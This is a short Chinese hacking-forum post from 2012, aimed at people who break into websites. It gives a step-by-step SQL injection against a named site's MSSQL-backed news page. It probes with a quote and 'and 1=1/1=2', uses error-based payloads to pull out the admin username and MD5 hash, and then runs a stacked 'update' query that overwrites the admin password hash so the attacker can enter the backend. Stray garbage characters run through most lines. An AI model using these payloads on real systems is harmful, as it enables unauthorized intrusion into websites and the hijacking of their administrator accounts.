经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
7 O) O; Q: ?& `8 M1 }可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
) w2 T- b J1 t; G0 g# {测试如下:3 i. G8 M3 ?1 u5 V1 @! V q
http://www.tmdsb.com/news.asp?id=121
, v0 `) F! B* q2 k( z' M在地址后输入单引号,显示
3 X1 u$ k; ?* X9 V# UMicrosoft OLE DB Provider for SQL Server 错误 ’80040e14’1 w$ b% k- t* V9 K/ V6 |) ]2 b2 e8 o9 N
字符串 ’’’ 之前有未闭合的引号
) O F6 P/ x. _$ A- A' d2 r/news/tmdws.asp,行63' s5 ?& W2 L0 F1 W0 L
说明没有过滤单引号且数据库是MSSQL.
. W. U$ E8 k) i& V% W) Hand 1=1正常。and 1=2出错。肯定存在注入
[% g$ {! `5 U7 E6 Z( [接着输入
. o l8 B2 K3 H% P9 @1 ~* a) Ghttp://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)5 A. ?4 n6 I* d
得到帐号为:admin: i/ _& c5 d" h7 t+ q
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
! H0 ]8 A$ J* k9 n5 w" U: n得到密码为:a4716077c2ba075c
; f/ n2 P+ a: O, R6 U) ]& H) d接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
0 \( Q2 O& x% h( W9 Q0 }命令如下 :
' ] m' O `5 `3 L6 [;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–, y+ V: P+ l2 F! G: V" \
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41